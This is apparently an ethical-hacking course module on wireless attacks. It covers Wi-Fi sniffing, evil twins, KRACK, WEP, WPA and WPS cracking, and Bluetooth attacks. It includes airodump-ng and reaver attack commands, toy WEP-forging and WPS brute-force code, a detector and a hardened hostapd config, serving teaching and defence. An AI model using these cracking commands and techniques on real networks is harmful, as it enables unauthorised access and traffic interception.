Ethical Hacking v10 Module 14 – Hacking Wireless Networks

Goals

• Understand Wireless Concepts
• Understand Wireless Encryption Algorithms
• Understand Wireless Threats
• Understand Wireless Hacking Methodologies
• Learn Wireless Hacking Tools
• Understand Bluetooth Hacking Techniques
• Understand Countermeasures to Wireless Hacking
• Learn Wireless Security Tools
• Understand Wireless Penetration Testing

Module 14.0 Hacking Wireless Networks

• 14.1 Wireless Concepts
• 14.2 Wireless Discovery and Mapping
• 14.3 Wi-Fi Sniffers
• 14.4 Wi-Fi Attacks
• 14.5 Wi-Fi Cracking
• 14.6 Wireless Hacking Tools
• 14.7 Bluetooth Hacking
• 14.8 Wireless Hacking Countermeasures
• 14.9 Wireless Security Tools
• 14.10 Wireless Penetration Testing

14.1 Wireless Concepts

Wireless Network Basics

• Wireless Local Area Networks (WLAN)
• Based on the IEEE 802.11 standard
• Uses radio channels for communication
• Devices connect to the network via a wireless access point
• Advantages
• Disadvantages

Wireless Network Advantages and Disadvantages

• Advantages
  • Fast, easy installation
  • Easy connectivity where cables can’t easily be used
  • Internet access from anywhere in range of an access point
  • Free internet connections in many public places
• Disadvantages
  • Security is a concern: the medium is shared, and anyone in radio range can receive every frame
  • The more devices on the network, the more the available bandwidth is shared between them
  • Upgrades may need new wireless access points and/or wireless cards
  • Wi-Fi networks can be disrupted by some electronic equipment

Wireless Terminology

• GSM
• Bandwidth
• BSSID
• ISM Band
• Access Point
• Hotspot
• Association
• Orthogonal Frequency-division Multiplexing (OFDM)
• Direct-sequence Spread Spectrum (DSSS)
• Frequency-hopping Spread Spectrum (FHSS)

How are Wired and Wireless Networks Different?

• Most wired exploits will also work against Wi-Fi wireless
  • Sniffing
  • Spoofing
  • MITM/Hijacking
  • DoS
• Wireless-specific: deauthentication/disassociation. 802.11 management frames are unauthenticated unless 802.11w (Protected Management Frames) is enabled, so anyone can forge them
• There are additional wireless network technologies that have their own vulnerabilities
  • RFID
  • NFC
  • Bluetooth
  • Cellular

Wireless Network Types

• Extension to a Wired Network
• LAN-to-LAN Wireless Network
• Multiple Access Points
• 3G/4G Hotspot

Accessing Wireless Networks

• 802.11a (5 GHz, OFDM)
• 802.11b (2.4 GHz, DSSS)
• 802.11g (2.4 GHz, OFDM)
• 802.11i (security amendment, not a radio standard; the basis of WPA2)
• 802.11n (2.4/5 GHz, MIMO)
• 802.11ac (5 GHz)
• 802.16 (WiMAX)
• 802.15.1 (Bluetooth)

Service Set Identifier (SSID)

• A token used to identify an 802.11 network
• A single identifier shared by the clients and the access point
• The access point broadcasts the SSID in its beacon frames
• SSID consists of human-readable text (up to 32 bytes)
• SSID on each host must be reconfigured when the network SSID is changed
• A client configured with a blank or “any” SSID will associate with whatever AP answers its probe requests
• Default values must be changed to ensure security
• On “closed” networks the AP omits the SSID from its beacons, but it is still sent in cleartext in probe requests, probe responses and association requests, so it is not actually secret

Authentication Modes for Wi-Fi

• Open-System Authentication
  • No key; any client is accepted (any confidentiality comes from the later WPA/WPA2 handshake, if one is configured)
• Shared-Key Authentication (WEP)
  • Password is set on the WAP and clients
  • The challenge/response exchange gives a sniffer a plaintext/ciphertext pair, i.e. RC4 keystream, so it is weaker than open system
• 802.1X/EAP
  • Client authenticates through the AP (the authenticator) to a RADIUS server; the port stays blocked until the EAP exchange succeeds
  • Per-session keys are derived from the EAP exchange
• Captive portal (web authentication; often confused with 802.1X)
  • Typically the WAP is open
  • Client gets a DHCP lease
  • Client browser opens/is redirected to a captive portal
  • Sometimes other protocols are permitted even if the browser can’t connect
  • Login is sent to a RADIUS/TACACS/TACACS+ server
  • Client caches a short-term session token

Wi-Fi Chalking

• WarWalking: Attackers on foot use Wi-Fi-enabled laptops to identify open networks
• WarChalking: Drawing symbols in public areas to indicate open networks
• WarFlying: Attackers use drones to identify open networks
• WarDriving: Attackers use a vehicle to move around with Wi-Fi-enabled laptops and identify open networks

Wi-Fi Chalking Symbols

• Free Wi-Fi
• Wi-Fi with WEP
• Wi-Fi with MAC Filtering
• Wi-Fi with Multiple Access Controls
• Restricted Wi-Fi
• Wi-Fi with Closed SSID
• Pay for Wi-Fi
• Wi-Fi Honeypot

Wireless Network Antennas

• Directional antenna
• Omnidirectional antenna
• Parabolic Grid antenna
• Yagi antenna
• Dipole antenna

14.2 Wireless Discovery and Mapping

Wireless Discovery

• Attackers must first discover and footprint a wireless network
• Active or passive footprinting of a wireless network
  • Active: send probe requests and record the probe responses (fast, but the probes are visible to a wireless IDS)
  • Passive: listen in monitor mode for beacons and other stations’ probes without transmitting anything
• Finding a wireless network:
  • Attacker will first check all potential networks
  • Attacker will move around with a wireless laptop to find active networks

Wireless Discovery Tools

• inSSIDer
• NetSurveyor
• Vistumbler
• NetStumbler
• WirelessMon
• Kismet
• WiFi Hopper
• Wavestumbler
• iStumbler
• WiFinder
• Wellenreiter
• AirCheck Wi-Fi Tester
• AirRaider 2
• Xirrus Wi-Fi Inspector
• WiFi Finder
• WeFi

InSSIDer Example

Mobile Wireless Discovery Tools

• WiFiFoFum WiFi Scanner
• WiFi Manager
• Network Signal Info
• OpenSignal Maps
• Fing
• Overlook WiFi

GPS Mapping

• Attacker makes a map and database of Wi-Fi networks
• Uses GPS to track Wi-Fi network locations and uploads the coordinates to a site
• Attackers share or sell the information

GPS Mapping Tools

• WiGLE
• Skyhook
• TamoGraph
• WiFi Site Survey
• Fluke AirMagnet

14.3 Wi-Fi Sniffers

Wireless Traffic Analysis

• Find vulnerabilities
• Do Wi-Fi reconnaissance
• Use a tool to conduct the analysis
• Select the appropriate card/chipset (one whose driver supports monitor mode and packet injection)

Wireless Sniffing

• Use sniffers like Wireshark to obtain signals that traverse the air
• An interface will by default receive only transmissions bound for it
• Promiscuous mode is not enough for 802.11: it only exposes frames on the network the card is associated with, already stripped of their 802.11 headers by the driver
• Put the interface in monitor mode (e.g. airmon-ng start wlan0) to capture raw 802.11 frames from every network on the channel, including management and control frames
• Sniffing can enable eavesdropping on communications
  • More viable on open Wi-Fi
  • Encryption largely mitigates the problem
  • Some information is sent in cleartext despite encryption: the 802.11 header (source/destination MAC, BSSID) and management frames (SSID, capabilities) are never encrypted
  • Use the MAC address in spoofing attacks

Wireless Sniffing (cont’d)

• In WPA/WPA2-PSK networks, use deauthentication to capture the four-way handshake
  • Client must perform the handshake when reconnecting
  • The handshake does not carry the PSK; it carries the AP and client nonces and a MIC computed with a key derived from the PSK
  • Capture those values, then try cracking the PSK offline: derive a candidate key from each guessed passphrase and check whether it reproduces the captured MIC
• airodump-ng to sniff for the handshake (the interface must be in monitor mode):
  • airodump-ng -c <channel> --bssid <AP MAC> -w capture wlan0mon

Wi-Fi Packet Sniffers

• Wireshark with AirPcap
• SteelCentral Packet Analyzer
• OmniPeek Network Analyzer
• CommView for Wi-Fi
• Sniffer Portable Professional Analyzer
• Capsa
• PRTG Network Monitor
• ApSniff
• NetworkMiner
• Airview
• Observer
• WifiScanner
• Mognet
• AirTraf

14.4 Wi-Fi Attacks

Wireless Threats

• Access Control Attack
• Integrity Attack
• Confidentiality Attack
• Availability Attack
• Authentication Attack
• Rogue Access Point Attack
• Client Mis-association
• Misconfigured WAP
• Unauthorized Association
• Ad Hoc Connection Attack
• HoneySpot Access Point Attack
• AP MAC Spoofing
• DoS Attack
• Jamming Signal Attack
• Wi-Fi Jamming Devices
• MITM
• Evil Twin

Launch Wireless Attacks

• Aircrack-ng Suite
• Reveal Hidden SSIDs
• Fragmentation Attack
• MAC Spoofing Attack
• Deauthentication Attack
• Disassociation Attack
• Man-in-the-Middle Attack
• MITM Attack using Aircrack-ng
• Wireless ARP Poisoning Attack
• Rogue Access Point
• Evil Twin

Evil Twin Attacks

• Evil Twin Attacks are a type of attack where a rogue access point attempts to deceive users into believing that it is a legitimate access point
• A form of social engineering
• Often facilitated through deauthentication
  • Attacker knocks the client off the real network
  • Client reconnects to the rogue AP
• Can launch all manner of attacks against the connected victim

Evil Twin Attacks (cont’d)

• Effective because it’s not always easy to determine the correct network
• Real and fake can have the same SSID
• Can use the same encryption protocol
• Fake can be placed close to the victim so it shows up as a strong signal
• Evil twins are usually open so as not to require a password
• Specific attacks leverage the evil twin to make it more effective

Evil Twin Attacks (cont’d)

• Karma attack:
  • Some client devices send out probe requests for known Wi-Fi networks
  • They don’t wait passively for an AP to send a beacon frame
  • Attacker listens for the request and responds with their rogue AP
  • Client doesn’t need to be close to the real AP
  • Attacker doesn’t need to broadcast a spoofed SSID

Evil Twin Attacks (cont’d)

• Downgrade attack:
  • Also called SSL strip
  • Entice the victim to connect to the evil twin
  • Victim navigates to an HTTPS site (typically by typing the name or following an http:// link)
  • Evil twin acts as a proxy with a secure connection to the site
  • Site responds, proxy intercepts the response and rewrites its https:// links to http://
  • Proxy forwards the response to the user, who believes they have a secure connection
  • User’s transmissions are sent in cleartext back to the proxy
  • Defeated by HSTS (especially preloaded HSTS): the browser refuses to fetch the site over HTTP at all, so there is nothing to strip
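The defender’s side of the deauthentication and evil-twin techniques on the preceding slides, as an added example that is not part of the course material. It runs over constructed 802.11 management-frame observations (the kind a monitor-mode sniffer such as airodump-ng or Kismet reports) and flags the two signatures a wireless IDS looks for: a managed SSID advertised from a BSSID that is not in the approved inventory or with weaker security than expected, and a burst of deauthentication frames aimed at one station. The `APPROVED` inventory, MAC addresses and frame records are all made up for the example.

```python
"""Evil-twin and deauth-flood indicators over sniffed 802.11 management
frames. Added example; inventory and observations are constructed."""
from collections import defaultdict
from dataclasses import dataclass

# Hypothetical approved inventory: SSID -> {BSSID: expected security}
APPROVED = {
    "CorpWiFi": {"00:11:22:33:44:01": "WPA2", "00:11:22:33:44:02": "WPA2"},
}

@dataclass(frozen=True)
class Frame:
    t: float                      # capture time in seconds
    subtype: str                  # "beacon", "probe_resp" or "deauth"
    bssid: str
    dst: str = "ff:ff:ff:ff:ff:ff"
    ssid: str = ""
    security: str = ""            # "OPEN", "WEP", "WPA", "WPA2" from the RSN/WPA IE

def check_beacons(frames):
    """Return (reason, ssid, bssid) alerts for evil-twin indicators."""
    alerts, seen = [], set()
    for f in frames:
        if f.subtype not in ("beacon", "probe_resp") or not f.ssid:
            continue
        key = (f.ssid, f.bssid, f.security)
        if key in seen:
            continue
        seen.add(key)
        known = APPROVED.get(f.ssid)
        if known is None:
            continue                      # SSIDs we don't own are not ours to police
        if f.bssid not in known:
            alerts.append(("unknown BSSID for managed SSID", f.ssid, f.bssid))
        if f.security not in set(known.values()):
            alerts.append(("security mismatch (downgrade?)", f.ssid, f.bssid))
    return alerts

def check_deauth(frames, window=10.0, threshold=20):
    """Flag (bssid, dst) pairs that receive more than `threshold` deauth
    frames inside any `window`-second span. A legitimate AP sends a handful
    at most; aireplay-ng --deauth sends bursts of 64 or more, and the source
    MAC is spoofed to look like the real AP."""
    by_pair = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            by_pair[(f.bssid, f.dst)].append(f.t)
    flagged = []
    for pair, times in by_pair.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):        # sliding window over timestamps
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 > threshold:
                flagged.append(pair)
                break
    return flagged

# Constructed observations: the real AP, an evil twin cloning the SSID as an
# open network from another BSSID, a guest network we don't manage, and a
# deauth flood at one client spoofed from the real AP's address.
SAMPLE = [
    Frame(0.0, "beacon", "00:11:22:33:44:01", ssid="CorpWiFi", security="WPA2"),
    Frame(0.1, "beacon", "de:ad:be:ef:00:01", ssid="CorpWiFi", security="OPEN"),
    Frame(0.2, "beacon", "aa:bb:cc:dd:ee:ff", ssid="GuestNet", security="OPEN"),
] + [Frame(1.0 + i * 0.05, "deauth", "00:11:22:33:44:01", dst="c0:ff:ee:00:00:01")
     for i in range(64)]

if __name__ == "__main__":
    for a in check_beacons(SAMPLE):
        print("ALERT", a)
    for p in check_deauth(SAMPLE):
        print("DEAUTH FLOOD", p)
```

Feeding real data in is a matter of parsing airodump-ng’s CSV or a pcap into `Frame` records; the thresholds are starting points and should be tuned against a baseline capture of the site.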

WiFi-Pumpkin Evil Twin Example

14.5 Wi-Fi Cracking

WEP Cracking

• Weak implementation of the RC4 algorithm
• A 24-bit Initialization Vector (IV) is prepended to the 40- or 104-bit shared key to form the per-packet RC4 key
• The IV is sent in cleartext, the IV space is tiny (2^24, so reuse is guaranteed on a busy network), and certain “weak” IVs leak key bytes through RC4’s key schedule
• Can run a statistical analysis if you capture enough IVs
  • ~20,000 IVs for a 40-bit key (64-bit encryption)
  • ~40,000 IVs for a 104-bit key (128-bit encryption)
• No message authentication: the ICV is CRC-32, a linear checksum, so ciphertext bits can be flipped and the ICV patched without detection
• No sequencing, so captured frames can be replayed
• Can capture a client ARP request and replay it to make the AP generate fresh IVs quickly
• Chosen ciphertext attack
• Replay attack
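Two of the WEP weaknesses listed above, keystream reuse and the linear CRC-32 ICV, shown as working code. This is an added example, not the course’s code: a toy WEP encapsulation (RC4 over IV||key with a CRC-32 ICV) plus the attacker-side functions. `recover_keystream` is what the fragmentation/chop-chop attacks give you (the PRGA), `forge_frame` is what packetforge-ng does with it, and `flip_bits` is the integrity attack. The key, IV and frames are constructed locally; nothing is captured from the air.

```python
"""WEP keystream reuse and CRC-32 bit flipping. Added example; key and
frames are constructed, not captured."""
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def crc32(data: bytes) -> bytes:
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV||key) XOR (plaintext || ICV). IV is 24 bits."""
    body = plaintext + crc32(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: returns the plaintext, or None if the ICV fails."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    pt, icv = body[:-4], body[-4:]
    return pt if crc32(pt) == icv else None

def recover_keystream(known_plaintext: bytes, frame: bytes) -> bytes:
    """Attacker side: a known plaintext (e.g. a predictable ARP request) XOR
    its ciphertext gives the keystream (PRGA) for that IV. No key needed."""
    return xor(frame[3:], known_plaintext + crc32(known_plaintext))

def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt an arbitrary frame under the reused IV with recovered keystream
    (packetforge-ng). The AP will accept it: the ICV verifies."""
    body = plaintext + crc32(plaintext)
    assert len(body) <= len(keystream), "need a longer keystream"
    return iv + xor(body, keystream)

def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Modify the ciphertext without knowing the key and fix up the encrypted
    ICV using CRC-32 linearity: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros)."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    delta = delta.ljust(n, b"\x00")
    icv_patch = xor(crc32(delta), crc32(bytes(n)))
    return iv + xor(ct[:n], delta) + xor(ct[n:], icv_patch)

# Constructed 40-bit key, one IV, and a stand-in for a predictable ARP frame.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"
KNOWN = b"ARP who-has 10.0.0.1"

if __name__ == "__main__":
    frame = wep_encrypt(KEY, IV, KNOWN)
    ks = recover_keystream(KNOWN, frame)               # attacker never sees KEY
    forged = forge_frame(IV, ks, b"ARP who-has 10.0.0.2")
    print("forged frame accepted:", wep_decrypt(KEY, forged))
    flipped = flip_bits(frame, b"\x00" * 12 + b"\x01")   # turn "10.0.0.1" into "00.0.0.1"
    print("flipped frame accepted:", wep_decrypt(KEY, flipped))
```

The same keystream decrypts every other frame sent under that IV, which is why the ~16 million IV space matters: on a busy AP, reuse happens within hours even without the replay trick.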

WEP Cracking Example

WPA/WPA2 Cracking

• WPA introduced TKIP (per-packet key mixing and the Michael MIC, still RC4); WPA2 uses much stronger encryption (AES-CCMP)
• Uses sequence numbers so replay can’t be used
• WPA/WPA2-PSK is still susceptible to a dictionary attack on the passphrase using a captured four-way handshake; the attack is offline, so lockouts don’t apply and only the attacker’s hardware and wordlist limit it
• WPA2 KRACK attack (2017) replays message 3 of the four-way handshake to the client
  • Client reinstalls the already-in-use session key and resets its nonce and replay counters
  • Nonce reuse lets the attacker decrypt and replay frames; the PSK itself is not recovered
  • Some clients (wpa_supplicant 2.4/2.5 on Linux and Android) cleared the key after first use, so the reinstalled key was all zeros and their traffic was trivially decryptable
  • The AP legitimately retransmits message 3 when it believes message 4 was dropped; that retransmission is what the attack abuses. Fixed by client patches

WPA2 Enterprise

• 802.1X with EAP (PEAP/MSCHAPv2, EAP-TLS, etc.)
• RADIUS server holds the credentials; each user authenticates individually
• Each session gets its own PMK from the EAP exchange, so there is no shared passphrase to crack; attacks shift to the EAP layer, e.g. an evil twin with a rogue RADIUS server harvesting MSCHAPv2 challenge/responses from clients that don’t validate the server certificate

Wi-Fi Protected Setup (WPS) Attacks

• WPS is an attempt to streamline Wi-Fi setup/device enrollment
• Clients use an 8-digit PIN to connect
  • The 8th digit is a checksum of the first 7, and the AP validates each half of the PIN separately (the first 4 digits, then the next 3)
  • Only 10,000 + 1,000 = 11,000 guesses in the worst case, not 10^8
  • Easy to crack online within hours
• Lockout policies can hamper online PIN cracking
  • Might take a couple of weeks, but still feasible
  • Lockout may key on the client MAC address, so spoofing could be used to bypass it
  • Brute forcing may trigger a DoS on certain WAPs

WPS Exploits

• Pixie Dust offline PIN cracking:
  • Recover the PIN in minutes
  • In the WPS exchange the AP (enrollee) sends two hashes, E-Hash1 and E-Hash2, that commit to the two halves of the PIN
  • Each hash is an HMAC over a secret nonce (E-S1 or E-S2), the PIN half, and the Diffie-Hellman public keys exchanged earlier
  • In some vendors’ APs the nonces E-S1 and E-S2 are weak (all zero, or from a predictable PRNG seeded from values visible in the exchange)
  • If the nonces are known, you can brute-force each PIN half offline and match the hashes to discover the PIN
• Reaver Pixie Dust attack (the interface must be in monitor mode):
  • reaver -i wlan0mon -b <AP MAC> -c <AP channel> -K 1
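Why a WPS PIN falls in at most 11,000 online guesses, as an added example that is not the course’s code. It implements the WPS checksum digit and a simulated registrar that, like the real protocol, reveals whether the first half matched before the second half is ever checked; an attacker therefore searches 10^4 and 10^3 independently rather than 10^7. The simulated AP also counts attempts and can enforce a lockout, which is the only thing standing between Reaver and the PIN on APs that leave WPS enabled. The PIN values and lockout threshold are constructed.

```python
"""WPS PIN structure and the split online brute force. Added example;
the AP is simulated, PINs and lockout settings are constructed."""

def wps_checksum(first7: int) -> int:
    """Checksum digit per the WPS spec: alternating 3x/1x digit weights, mod 10."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10); n //= 10
        acc += n % 10;       n //= 10
    return (10 - acc % 10) % 10

def valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])

class SimulatedAP:
    """Stands in for the registrar side of the exchange. Reveals, exactly as
    M4/M5 and M6/M7 do, whether the first half matched before the second
    half is checked. Counts attempts so lockout behaviour can be modelled."""
    def __init__(self, pin: str, lockout_after=None):
        assert valid_pin(pin)
        self.pin, self.attempts, self.lockout_after = pin, 0, lockout_after

    def try_pin(self, guess: str):
        """Returns (first_half_ok, second_half_ok)."""
        self.attempts += 1
        if self.lockout_after and self.attempts > self.lockout_after:
            raise RuntimeError("AP locked WPS; wait, or spoof the MAC and retry")
        first = guess[:4] == self.pin[:4]
        second = first and guess[4:] == self.pin[4:]
        return first, second

def bruteforce(ap: SimulatedAP) -> str:
    """Reaver-style online attack: at most 10,000 + 1,000 attempts."""
    for a in range(10_000):                       # first half, second half irrelevant
        if ap.try_pin(f"{a:04d}0000")[0]:
            break
    else:
        raise ValueError("no first half matched")
    for b in range(1000):                         # second half: 3 digits + checksum
        guess = f"{a:04d}{b:03d}"
        guess += str(wps_checksum(int(guess)))
        if ap.try_pin(guess)[1]:
            return guess
    raise ValueError("no second half matched")

def search_space():
    """(valid 8-digit PINs, worst-case online guesses with the split oracle)."""
    return 10 ** 7, 10_000 + 1_000

if __name__ == "__main__":
    ap = SimulatedAP("12345670")                  # a common vendor default PIN
    print(bruteforce(ap), "after", ap.attempts, "attempts;", search_space())
```

Pixie Dust removes even the online step: with predictable E-S1/E-S2 the same two halves are matched against E-Hash1/E-Hash2 locally, so no lockout ever triggers.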

Cracking Wireless Encryption – WPA/WEP Cracking Tools

• Aircrack-ng
• Besside-ng
• KisMAC
• Cain & Abel
• Elcomsoft Wireless Security Auditor
• WepAttack
• Wesside-ng
• Reaver Pro
• WEPCrack
• WepDecrypt
• Portable Penetrator
• CloudCracker
• coWPAtty
• Wifite
• WepCrackGui
• Penetrate Pro
• Fern WiFi Cracker

WPS Reaver Attack Example

14.6 Wireless Hacking Tools

Sniffers

• Kismet
• Wireshark
• Airodump-ng
• Vericode
• Monitis

Wardriving Tools

• Airbase-ng
• ApSniff
• WiFiFoFum
• MiniStumbler
• WarLinux
• MacStumbler
• WiFi-Where
• AirFart
• AirTraf
• 802.11 Network Discovery Tools

Monitors

• NetworkManager
• KWiFiManager
• NetworkControl
• Sentry Edge II
• WaveNode
• xosview
• RF Monitor
• DTC-340 RFXpert
• RF Explorer
• Home Curfew RF Monitoring System
• SigMon

Analyzer Tools

• AirMagnet WiFi Analyzer
• OptiView XG Network Analysis Tablet
• Observer
• Ufasoft Snif
• vxSniffer
• OneTouch AT Network Assistant
• Capsa Network Analyzer
• SoftPerfect Network Protocol Analyzer
• OmniPeek Network Analyzer
• CommView for WiFi

Packet Capturing Tools

• WirelessNetView
• Tcpdump
• Airview
• RawCap
• Airodump-ng

Spectrum Analysis Tools

• Cisco Spectrum Expert
• AirMedic USB
• AirSleuth-Pro
• BumbleBee-LX Spectrum Analyzer
• Wi-Spy

MITM / Evil Twin Tools

• Karma
• Wi-Fi Pumpkin
• Wi-Fi Pineapple

Mobile Hacking Tools

• WiHack
• Backtrack Simulator
• Wps Wpa Tester

14.7 Bluetooth Hacking

Bluetooth Modes

• Discoverable modes:
  • Discoverable
  • Limited Discoverable
  • Non-discoverable
• Pairing modes:
  • Non-pairable
  • Pairable

Bluetooth Threats

• Leaking Personal Information
• Controlling Device Remotely
• Device Bugging
• Social Engineering
• Sending False SMS Messages
• Introduction of Malicious Code
• Hiking Up Phone Bill Causing Financial Stress
• Taking Advantage of Vulnerabilities in Protocols

Bluetooth Attacks

• Bluejacking
  • Sending unsolicited messages to Bluetooth-enabled devices
• Bluesnarfing
  • Unauthorized information access on a device
• Bluebugging
  • Unauthorized system access to a device
• BlueBorne
  • Collection of memory-corruption (overflow) and related Bluetooth stack vulnerabilities that can result in arbitrary code execution
  • Pairing and discoverability are not required on the target; Bluetooth only needs to be switched on
  • Requires no user interaction

Bluesnarfing Example

Bluetooth Attacks (cont’d)

• Bluesmacking
  • DoS
• BluePrinting
  • Remotely discover details about Bluetooth-enabled devices
• MAC Spoofing Attack
• Man-in-the-Middle/Impersonation Attack

Bluetooth Hacking Tools

• PhoneSnoop
• BlueScanner
• BH BlueJack
• Bluesnarfer
• btCrawler
• Bluediving
• Blooover II
• btscanner
• CIHwBT
• BT Audit
• Blue Alert
• Blue Sniff

14.8 Wireless Hacking Countermeasures

Defending Against Bluetooth Hacking

• Ensure PIN keys use non-regular patterns
• Ensure the device is always in hidden (non-discoverable) mode
• Keep track of all past paired devices and delete suspicious ones
• Ensure Bluetooth is kept disabled unless required
• Never accept pairing requests from unknown devices
• Ensure encryption is enabled when connecting to a PC

Defending Against Bluetooth Hacking (cont’d)

• Keep the device’s radio range at its lowest setting
• Only pair with other devices in a secure area
• Ensure antivirus is installed
• Ensure default security settings are changed to the best possible standard
• Ensure all Bluetooth connections use link encryption
• Ensure encryption is enabled for every wireless communication the device uses

Wireless Security Layers

• Connection Security
• Wireless Signal Security
• Device Security
• End-user Protection
• Data Protection
• Network Protection

Defending Against Wireless Attacks

Configuration Best Practices:
• Ensure the default SSID is changed once the WLAN is configured
• Ensure remote router login is disabled
• Ensure a router access password is set and firewall protection is enabled
• Ensure MAC address filtering is enabled on routers/access points
• Ensure SSID broadcasts are disabled at access points and the passphrase is changed frequently
• Note that MAC filtering and SSID hiding only raise the bar slightly: client MACs are visible in every frame and trivially spoofed, and a hidden SSID still appears in probe and association frames. Treat them as hygiene, not as a substitute for WPA2/WPA3 with strong keys

Defending Against Wireless Attacks (cont’d)

SSID Settings Best Practices:
• Always use SSID cloaking (it hides the network from casual scanners only)
• Keep passphrases free of the SSID, network/company name, or anything that is easy to figure out
• Ensure there is a firewall/packet filter between the AP and the intranet
• Keep wireless signal strength low enough to avoid detection outside the organization
• Regularly ensure there are no issues with setup/configuration
• Use extra traffic encryption (e.g. a VPN, or TLS end to end) so a cracked Wi-Fi key alone exposes nothing

Defending Against Wireless Attacks (cont’d)

Authentication Best Practices:
• Use WPA instead of WEP
• Use WPA2 if possible (WPA2-AES/CCMP, not TKIP; WPA3 where supported)
• Ensure access points are in secure locations
• Ensure all wireless drivers are up to date
• Ensure the network is disabled when it isn’t needed
• Ensure authentication via a centralized server (802.1X/RADIUS)
• Disable WPS, and enable Protected Management Frames (802.11w) so forged deauthentication frames are rejected
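A hostapd configuration that implements the authentication and configuration practices on these slides, as an added example (not from the course). Each comment names the weaker setting the line replaces, mirroring the attacks earlier in the module. The interface name, RADIUS address and shared secret are placeholders to be replaced for a real deployment.

```ini
# hostapd.conf: hardened WPA2-Enterprise access point (added example)
interface=wlan0
ssid=CorpWiFi
hw_mode=g
channel=6

# Open-system authentication only. auth_algs=3 would also allow WEP
# shared-key auth, whose challenge/response leaks RC4 keystream.
auth_algs=1

# RSN (WPA2) only: wpa=3 would add WPA1/TKIP fallback for downgrade attacks.
wpa=2

# 802.1X/EAP instead of a shared passphrase: no PSK to crack from a
# captured four-way handshake. If no RADIUS is available, use WPA-PSK
# with a long random wpa_passphrase instead.
wpa_key_mgmt=WPA-EAP
ieee8021x=1
auth_server_addr=10.0.0.5
auth_server_port=1812
auth_server_shared_secret=CHANGE-ME-to-a-long-random-secret

# AES-CCMP only; no TKIP (rsn_pairwise=TKIP CCMP would allow the RC4 cipher).
rsn_pairwise=CCMP

# 802.11w Protected Management Frames required: forged deauthentication
# and disassociation frames from aireplay-ng are dropped by clients.
ieee80211w=2

# WPS disabled: wps_state=2 exposes the 11,000-guess PIN and Pixie Dust.
wps_state=0

# Leave the SSID in beacons: ignore_broadcast_ssid=1 hides nothing from a
# sniffer and makes clients leak the SSID in probe requests everywhere.
ignore_broadcast_ssid=0
```

Clients must be configured to validate the RADIUS server’s certificate (and, for PEAP, to refuse unknown CAs), otherwise an evil twin with its own RADIUS server can still harvest credentials.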

14.9 Wireless Security Tools

Wireless Security Auditing Tools

• AirMagnet WiFi Analyzer
• Motorola’s AirDefense Services Platform (ADSP)
• Adaptive Wireless IPS
• Aruba RFProtect

Wireless Intrusion Prevention Systems

• Extreme Networks Intrusion Prevention System
• AirMagnet Enterprise
• Dell SonicWALL Clean Wireless
• HP TippingPoint NX Platform NGIPS
• AirTight WIPS
• Network Box IDP
• AirMobile Server
• Wireless Policy Manager (WPM)
• ZENworks Endpoint Security Management
• FortiWiFi

Wireless Predictive Planning Tools

• AirMagnet Planner
• Cisco Prime Infrastructure
• AirTight Planner
• LANPlanner
• RingMaster
• Connect EZ Predictive RF CAD Design
• Ekahau Site Survey (ESS)
• ZonePlanner
• Wi-Fi Planning Tool
• TamoGraph Site Survey

Wireless Vulnerability Scanning Tools

• Zenmap
• Nessus
• OSWA-Assistant
• Network Security Toolkit
• Nexpose Community Edition
• WiFish Finder
• Penetrator Vulnerability Scanning Appliance
• SILICA
• WebSploit
• Airbase-ng

Bluetooth Security Tools

• No automatic pairing
• Turn off discovery
• Bluetooth Firewall

Mobile Wi-Fi Security Tools

• WiFi Protector
• WiFiGuard
• Wifi Inspector

14.10 Wireless Penetration Testing

Steps to Penetration Testing Wireless

• Put the interface into monitor mode with airmon-ng, then discover WAPs with airodump-ng
• Query WAPs for protocols (the privacy, cipher and authentication fields advertised in their beacons)
• Use directional antennas for better signal gain
• Use Wireshark to capture unencrypted traffic
• Use the Aircrack-ng suite, Fern WiFi Cracker, or besside-ng to crack WEP, WPA, WPA2
• Use Karma for MITM attacks
• Use Reaver/Pixie Dust to crack WPS
• Use social engineering/evil twins to capture user passwords wirelessly

Wireless Hacking Review

• IEEE 802.11 Wi-Fi networks are used for data transfer/communication across a radio network
• Wi-Fi infrastructure is made of software and hardware
• Most used encryption: WPA, WPA2, and WEP; WPA2 is the most secure of the three
• WEP uses a 24-bit IV, the RC4 stream cipher, and a CRC-32 checksum
• WPA uses TKIP: the RC4 stream cipher with 128-bit per-packet keys and a 64-bit Michael MIC key; WPA2 derives a 256-bit PMK and encrypts with AES-CCMP using a 128-bit temporal key
• WEP is vulnerable to analytical attacks
• Countermeasures to Wi-Fi attacks are wireless IDS systems and best practices for configuration, SSID, and authentication

Penetrating Wireless Networks Review

• Use aircrack-ng to crack keys on Wi-Fi networks secured with WEP
• Use an ARP replay attack to make the AP emit a stream of newly encrypted frames, each with a fresh 24-bit IV
• Speed up WEP cracking with a fragmentation attack using aireplay-ng
• Use the PRGA (keystream) obtained from fragmentation to craft a packet with packetforge-ng
• Send the crafted packet to an AP to easily obtain thousands of IVs
• Check the laws in your area before using radio jamming devices

